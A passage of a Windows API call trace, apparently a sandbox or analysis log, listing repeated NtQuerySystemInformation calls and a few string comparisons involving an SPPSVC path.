NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0227.150] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0227.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0227.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0227.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0227.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0227.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.151] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0227.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0227.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0227.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0227.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf40, Length=0x20, ResultLength=0x0) [0227.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf40, Length=0x20, ResultLength=0x0) [0227.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.152] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4a8, Length=0x50, ResultLength=0x0) [0227.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.153] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3d0, Length=0x38, ResultLength=0x0) [0227.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd200, Length=0x28, ResultLength=0x0) [0227.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd200, Length=0x28, ResultLength=0x0) [0227.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd200, Length=0x28, ResultLength=0x0) [0227.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd200, Length=0x28, ResultLength=0x0) [0227.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0227.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3d0, Length=0x38, ResultLength=0x0) [0227.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x28, ResultLength=0x0) [0227.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x28, ResultLength=0x0) [0227.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3d0, Length=0x38, ResultLength=0x0) [0227.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x20, ResultLength=0x0) [0227.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0227.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0227.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0227.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3d0, Length=0x38, ResultLength=0x0) [0227.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x20, ResultLength=0x0) [0227.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x20, ResultLength=0x0) [0227.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x20, ResultLength=0x0) [0227.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0227.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0227.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0227.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0227.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0227.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.163] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0227.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x28, ResultLength=0x0) [0227.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0227.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.164] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0227.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1a0, Length=0x28, ResultLength=0x0) [0227.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0227.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x20, ResultLength=0x0) [0227.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0227.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0227.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x20, ResultLength=0x0) [0227.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0227.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x20, ResultLength=0x0) [0227.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0227.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0227.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.168] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.169] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd338, Length=0x50, ResultLength=0x0) [0227.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x38, ResultLength=0x0) [0227.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0227.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0227.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x28, ResultLength=0x0) [0227.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd100, Length=0x28, ResultLength=0x0) [0227.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x38, ResultLength=0x0) [0227.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0227.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd180, Length=0x28, ResultLength=0x0) [0227.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x38, ResultLength=0x0) [0227.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0227.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0227.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0227.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd060, Length=0x20, ResultLength=0x0) [0227.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd260, Length=0x38, ResultLength=0x0) [0227.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0e0, Length=0x20, ResultLength=0x0) [0227.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0227.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd070, Length=0x20, ResultLength=0x0) [0227.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.176] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd648, Length=0x50, ResultLength=0x0) [0227.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd5c0, Length=0x28, ResultLength=0x0) [0227.177] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd648, Length=0x50, ResultLength=0x0) [0227.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd648, Length=0x50, ResultLength=0x0) [0227.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0227.177] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4b0, Length=0x28, ResultLength=0x0) [0227.178] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0227.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0227.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0227.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd530, Length=0x50, ResultLength=0x0) [0227.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.178] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x38, ResultLength=0x0) [0227.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.180] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0227.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0227.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd290, Length=0x28, ResultLength=0x0) [0227.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd300, Length=0x28, ResultLength=0x0) [0227.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd460, Length=0x38, ResultLength=0x0) [0227.181] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.182] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd380, Length=0x28, ResultLength=0x0) [0227.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.186] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0227.186] NtQuerySystemInformation 